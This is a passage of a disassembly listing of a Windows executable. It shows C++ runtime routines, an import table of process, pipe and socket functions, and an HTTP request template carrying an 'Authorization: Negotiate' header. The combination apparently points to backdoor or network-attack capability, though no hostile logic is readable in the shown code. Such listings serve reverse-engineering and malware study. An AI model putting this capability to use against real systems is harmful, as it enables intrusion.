test dl, dl
jz short loc_42065F
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_420663
jmp short loc_42065C
; ---------------------------------------------------------------------------
loc_420654: ; CODE XREF: sub_420607+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_420668
loc_42065C: ; CODE XREF: sub_420607+4B�j
inc ecx
jmp short loc_420625
; ---------------------------------------------------------------------------
loc_42065F: ; CODE XREF: sub_420607+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420663: ; CODE XREF: sub_420607+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420668: ; CODE XREF: sub_420607+25�j
; sub_420607+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_420607 endp
; =============== S U B R O U T I N E =======================================
sub_42067A proc near ; CODE XREF: sub_4098D4+21�p
; sub_4205A0+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_4206A1
push esi
call sub_415B10
inc eax
push eax
call sub_415BE9
pop ecx
test eax, eax
pop ecx
jz short loc_4206A1
push esi
push eax
call sub_415A20
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4206A1: ; CODE XREF: sub_42067A+7�j
; sub_42067A+1A�j
xor eax, eax
pop esi
retn
sub_42067A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4206B0 proc near ; CODE XREF: sub_404ADF+12�p
; sub_404B39+12�p ...
mov eax, offset loc_420BA0
call sub_4162F0
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_404CE4
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_415B10
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_404D1C
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_42070A
lea eax, [ebp-3Ch]
push offset dword_421FA8
push eax
mov dword ptr [ebp-3Ch], offset off_421C6C
call sub_420B09
pop esi
sub_4206B0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42070A proc near ; CODE XREF: sub_4206B0+3F�p
; sub_4208DC+3F�p
mov eax, offset loc_420BB4
call sub_4162F0
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset byte_43B658
call sub_420A2E
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_404CE4
push dword_421C98
mov ecx, edi
push 0
push ebx
call sub_404B91
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_421C8C
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_42070A endp
; =============== S U B R O U T I N E =======================================
sub_42076E proc near ; DATA XREF: .text:00421C70�o
; .text:00421C90�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_42077A
mov eax, offset dword_421258
locret_42077A: ; CODE XREF: sub_42076E+5�j
retn
sub_42076E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42077B proc near ; DATA XREF: .text:00421C94�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4207F1
lea eax, [ebp+var_1C]
push offset dword_422018
push eax
call sub_420B09
sub_42077B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420798 proc near ; CODE XREF: .text:004207D8�p
; DATA XREF: .text:0042201C�o
mov eax, offset loc_420BC8
call sub_4162F0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_421C8C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_404CE4
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_420AB5
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_420798 endp
; ---------------------------------------------------------------------------
loc_4207D5: ; DATA XREF: .text:off_421C8C�o
push esi
mov esi, ecx
call sub_420798
test byte ptr [esp+8], 1
jz short loc_4207EB
push esi
call sub_41630F
pop ecx
loc_4207EB: ; CODE XREF: .text:004207E2�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4207F1 proc near ; CODE XREF: sub_42077B+A�p
; sub_4208C4+7�p ...
mov eax, offset loc_420BDC
call sub_4162F0
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_420A6B
mov al, [ebx+0Ch]
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov ecx, edi
mov [edi], al
call sub_404CE4
push dword_421C98
mov ecx, edi
push 0
push ebx
call sub_404B91
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_421C8C
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_4207F1 endp
; =============== S U B R O U T I N E =======================================
sub_42084E proc near ; CODE XREF: sub_42088B+20�p
; DATA XREF: .text:00421FAC�o
mov eax, offset loc_420BF0
call sub_4162F0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_421C8C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_404CE4
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_420AB5
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_42084E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42088B proc near ; DATA XREF: .text:00421C74�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4208C4
lea eax, [ebp+var_1C]
push offset dword_421FA8
push eax
call sub_420B09
loc_4208A8: ; DATA XREF: .text:off_421C6C�o
push esi
mov esi, ecx
call sub_42084E
test [esp+20h+var_18], 1
jz short loc_4208BE
push esi
call sub_41630F
pop ecx
loc_4208BE: ; CODE XREF: sub_42088B+2A�j
mov eax, esi
pop esi
retn 4
sub_42088B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4208C4 proc near ; CODE XREF: sub_42088B+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4207F1
mov dword ptr [esi], offset off_421C6C
mov eax, esi
pop esi
retn 4
sub_4208C4 endp
; =============== S U B R O U T I N E =======================================
sub_4208DC proc near ; CODE XREF: sub_404B91+13�p
; sub_404D51+E�p
mov eax, offset loc_420C04
call sub_4162F0
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_404CE4
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_415B10
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_404D1C
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_42070A
lea eax, [ebp-3Ch]
push offset dword_4220D0
push eax
mov dword ptr [ebp-3Ch], offset off_421CA0
call sub_420B09
pop esi
sub_4208DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420936 proc near ; CODE XREF: sub_420973+20�p
; DATA XREF: .text:004220D4�o
mov eax, offset loc_420C18
call sub_4162F0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_421C8C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_404CE4
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_420AB5
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_420936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420973 proc near ; DATA XREF: .text:00421CA8�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4209AC
lea eax, [ebp+var_1C]
push offset dword_4220D0
push eax
call sub_420B09
loc_420990: ; DATA XREF: .text:off_421CA0�o
push esi
mov esi, ecx
call sub_420936
test [esp+20h+var_18], 1
jz short loc_4209A6
push esi
call sub_41630F
pop ecx
loc_4209A6: ; CODE XREF: sub_420973+2A�j
mov eax, esi
pop esi
retn 4
sub_420973 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4209AC proc near ; CODE XREF: sub_420973+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4207F1
mov dword ptr [esi], offset off_421CA0
mov eax, esi
pop esi
retn 4
sub_4209AC endp
; =============== S U B R O U T I N E =======================================
sub_4209C4 proc near ; DATA XREF: .text:0042300C�o
; FUNCTION CHUNK AT 004209FA SIZE 0000000C BYTES
test byte_46BDF4, 1
jnz short loc_4209D4
or byte_46BDF4, 1
loc_4209D4: ; CODE XREF: sub_4209C4+7�j
call sub_4209EE
test byte_46D180, 1
jnz short loc_4209E9
or byte_46D180, 1
loc_4209E9: ; CODE XREF: sub_4209C4+1C�j
jmp loc_4209FA
sub_4209C4 endp
; =============== S U B R O U T I N E =======================================
sub_4209EE proc near ; CODE XREF: sub_4209C4:loc_4209D4�p
push offset nullsub_1
call sub_4166D0
pop ecx
retn
sub_4209EE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4209C4
loc_4209FA: ; CODE XREF: sub_4209C4:loc_4209E9�j
push offset nullsub_1
call sub_4166D0
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4209C4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_420A06 proc near ; CODE XREF: sub_40443B+5E�p
; sub_405398+157�p
jmp dword_4211D8
sub_420A06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_420A0C proc near ; CODE XREF: sub_415F5C+23�p
; sub_416200+13�p
jmp dword_421154
sub_420A0C endp
; =============== S U B R O U T I N E =======================================
sub_420A12 proc near ; DATA XREF: .text:off_421CC8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_420AB5
test [esp+4+arg_0], 1
jz short loc_420A28
push esi
call sub_41630F
pop ecx
loc_420A28: ; CODE XREF: sub_420A12+D�j
mov eax, esi
pop esi
retn 4
sub_420A12 endp
; =============== S U B R O U T I N E =======================================
sub_420A2E proc near ; CODE XREF: sub_42070A+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_421CC8
push dword ptr [edi]
call sub_415B10
inc eax
push eax
call sub_416655
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_420A5D
push dword ptr [edi]
push eax
call sub_415A20
pop ecx
pop ecx
loc_420A5D: ; CODE XREF: sub_420A2E+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_420A2E endp
; =============== S U B R O U T I N E =======================================
sub_420A6B proc near ; CODE XREF: sub_4207F1+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_421CC8
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_420AA8
push dword ptr [edi+4]
call sub_415B10
inc eax
push eax
call sub_416655
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_420AAE
push dword ptr [edi+4]
push eax
call sub_415A20
pop ecx
pop ecx
jmp short loc_420AAE
; ---------------------------------------------------------------------------
loc_420AA8: ; CODE XREF: sub_420A6B+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_420AAE: ; CODE XREF: sub_420A6B+2E�j
; sub_420A6B+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_420A6B endp
; =============== S U B R O U T I N E =======================================
sub_420AB5 proc near ; CODE XREF: sub_420798+2B�p
; sub_42084E+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_421CC8
jz short locret_420ACA
push dword ptr [ecx+4]
call sub_41630F
pop ecx
locret_420ACA: ; CODE XREF: sub_420AB5+A�j
retn
sub_420AB5 endp
; ---------------------------------------------------------------------------
mov eax, [ecx+4]
test eax, eax
jnz short locret_420AD7
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_420AD7: ; CODE XREF: .text:00420AD0�j
retn
; =============== S U B R O U T I N E =======================================
sub_420AD8 proc near ; CODE XREF: .text:00420AF0�p
mov dword ptr [ecx], offset off_421CE8
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_420AEC
push ecx
call sub_415C9B
pop ecx
locret_420AEC: ; CODE XREF: sub_420AD8+B�j
retn
sub_420AD8 endp
; ---------------------------------------------------------------------------
loc_420AED: ; DATA XREF: .text:off_421CE8�o
push esi
mov esi, ecx
call sub_420AD8
test byte ptr [esp+8], 1
jz short loc_420B03
push esi
call sub_41630F
pop ecx
loc_420B03: ; CODE XREF: .text:00420AFA�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B09 proc near ; CODE XREF: sub_4206B0+54�p
; sub_42077B+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_421CF0
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_421188 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_420B09 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_420B44 proc near ; DATA XREF: .text:00421E9C�o
; FUNCTION CHUNK AT 00404AD7 SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_404AD7
sub_420B44 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_420B62
mov ecx, [ebp+8]
jmp loc_404AD7
; ---------------------------------------------------------------------------
locret_420B62: ; CODE XREF: .text:00420B54�j
retn
; ---------------------------------------------------------------------------
loc_420B63: ; DATA XREF: sub_40467C�o
mov eax, offset dword_421EA0
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+14h]
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_420B78: ; DATA XREF: .text:00421EC8�o
lea ecx, [ebp-1Ch]
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_420B80: ; DATA XREF: sub_40481B�o
mov eax, offset dword_421ECC
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
loc_420B8C: ; DATA XREF: sub_404DB8�o
mov eax, offset dword_421F1C
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_420BA0: ; DATA XREF: sub_4206B0�o
mov eax, offset dword_421FB8
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-14h]
jmp sub_420AB5
; ---------------------------------------------------------------------------
loc_420BB4: ; DATA XREF: sub_42070A�o
mov eax, offset dword_421FE0
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_420AB5
; ---------------------------------------------------------------------------
loc_420BC8: ; DATA XREF: sub_420798�o
mov eax, offset dword_422028
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_420AB5
; ---------------------------------------------------------------------------
loc_420BDC: ; DATA XREF: sub_4207F1�o
mov eax, offset dword_422050
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_420AB5
; ---------------------------------------------------------------------------
loc_420BF0: ; DATA XREF: sub_42084E�o
mov eax, offset dword_422078
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_420C04: ; DATA XREF: sub_4208DC�o
mov eax, offset dword_4220E0
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_420AB5
; ---------------------------------------------------------------------------
loc_420C18: ; DATA XREF: sub_420936�o
mov eax, offset dword_422108
jmp loc_415FAB
; ---------------------------------------------------------------------------
align 4
dd 0F7h dup(0)
dword_421000 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_421004 dd 7C833478h ; resolved to->KERNEL32.SetEnvironmentVariableAdword_421008 dd 7C80A35Eh ; resolved to->KERNEL32.CompareStringW ; sub_420119+261�r
dword_42100C dd 7C80D077h ; resolved to->KERNEL32.CompareStringA ; sub_420119+B9�r
dword_421010 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_421014 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_421018 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_42101C dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_41E7F5+6�r
dword_421020 dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_421024 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_41DCE8:loc_41DD3B�r
dword_421028 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_41DA93+12D�r
dword_42102C dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_41DA93+8D�r
dword_421030 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_41D4EF+166�r ...
dword_421034 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_41D7B5+143�r
dword_421038 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_42103C dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_421040 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_41D3BD+E1�r
dword_421044 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_421048 dd 7C80C058h ; resolved to->KERNEL32.ExitThreaddword_42104C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_421050 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4010B2+2D4�r ...
dword_421054 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4018CB+FF�r
dword_421058 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_40A9D8+183�r ...
dword_42105C dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_40B078+D�r ...
dword_421060 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40282F+E3�r ...
dword_421064 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_4030B0+65�r ...
dword_421068 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_406978+80�r ...
dword_42106C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4033B6+150�r ...
dword_421070 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_409D34+AE�r ...
dword_421074 dd 7C8312E5h ; resolved to->KERNEL32.TransactNamedPipedword_421078 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_406048+1C3�r ...
dword_42107C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_4071B6+58�r ...
dword_421080 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; sub_40A9D8+1B6�r
dword_421084 dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; sub_40A9D8+19F�r
dword_421088 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_4071B6+12B�r ...
dword_42108C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_4071B6+10B�r ...
dword_421090 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_406978+38�r ...
dword_421094 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_409D34+10F�r ...
dword_421098 dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_4087CA+C0�r ...
dword_42109C dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTimedword_4210A0 dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTimedword_4210A4 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_4062F7+5DC�r ...
dword_4210A8 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA ; sub_4087CA+26�r
dword_4210AC dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_40B61A+259�r ...
dword_4210B0 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_4210B4 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4210B8 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_4210BC dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_4078DF+241�r
dword_4210C0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_40891C:loc_408E0C�r ...
dword_4210C4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_41A77A+15�r ...
dword_4210C8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_409D34+FB�r ...
dword_4210CC dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_4210D0 dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_4210D4 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_4210D8 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4210DC dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4210E0 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4210E4 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4210E8 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_4210EC dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_409EBC+B4�r ...
dword_4210F0 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_4210F4 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_40C574+1BF�r ...
dword_4210F8 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_40CD3A+3C9B�r
dword_4210FC dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_421100 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_421104 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_413BE5+C�r ...
dword_421108 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipedword_42110C dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; .text:004140F2�r ...
dword_421110 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_421114 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_40C48C+DF�r ...
dword_421118 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_40CD3A+46F3�r ...
dword_42111C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_413C50+184�r ...
dword_421120 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_421124 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_421128 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40C574+2FA�r
dword_42112C dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_421130 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_414F15+27�r
dword_421134 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_421138 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_41C639+20D�r ...
dword_42113C dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; .text:00414011�r
dword_421140 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_413EDB+1F�r ...
dword_421144 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_421148 dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrivesdword_42114C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_41737F+C6�r ...
dword_421150 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_418CE8+2C5�r ...
dword_421154 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_421158 dd 7C8350BFh ; resolved to->KERNEL32.GetTimeZoneInformation ; sub_41EA02+38�r
dword_42115C dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTimedword_421160 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_41737F+22D�r ...
dword_421164 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_41D4EF+59�r
dword_421168 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_42116C dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_421170 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_421174 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_421178 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_42117C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree ; sub_4197BC+120�r ...
dword_421180 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_4193CB+51�r ...
dword_421184 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_421188 dd 7C812A09h ; resolved to->KERNEL32.RaiseException ; sub_420B09+2E�r
dword_42118C dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_421190 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_41C639+A7�r
dword_421194 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_41C639+14D�r ...
dword_421198 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_41CA9C+14�r ...
dword_42119C dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4211A0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4211A4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4211A8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4211B0 dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_4059FC+8E�r
dword_4211B4 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_40597F+15�r
dword_4211B8 dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_4211BC dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_4211C0 dd 71AB3E00h ; resolved to->WS2_32.binddword_4211C4 dd 71AB88D3h ; resolved to->WS2_32.listendword_4211C8 dd 71AC1028h ; resolved to->WS2_32.acceptdword_4211CC dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_4211D0 dd 71AC0BDEh ; resolved to->WS2_32.shutdowndword_4211D4 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_405398+115�r
dword_4211D8 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4211DC dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_402DD1+2A�r ...
dword_4211E0 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40297A+EE�r ...
dword_4211E4 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_402DD1+49�r ...
dword_4211E8 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_402DD1+64�r ...
dword_4211EC dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40282F+135�r ...
dword_4211F0 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40297A+26D�r ...
dword_4211F4 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_402DD1+154�r ...
align 10h
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40481B+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_421240 dq 1.388888888888889e-2 ; DATA XREF: sub_404630+2F�r
dbl_421248 dq 1.666666666666667e-1 ; DATA XREF: sub_404630+15�r
dbl_421250 dq 1.333333333333333 ; DATA XREF: sub_40467C+7A�r
dword_421258 dd 2 dup(0) ; sub_404B91+57�o ...
dword_421260 dd 0 dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
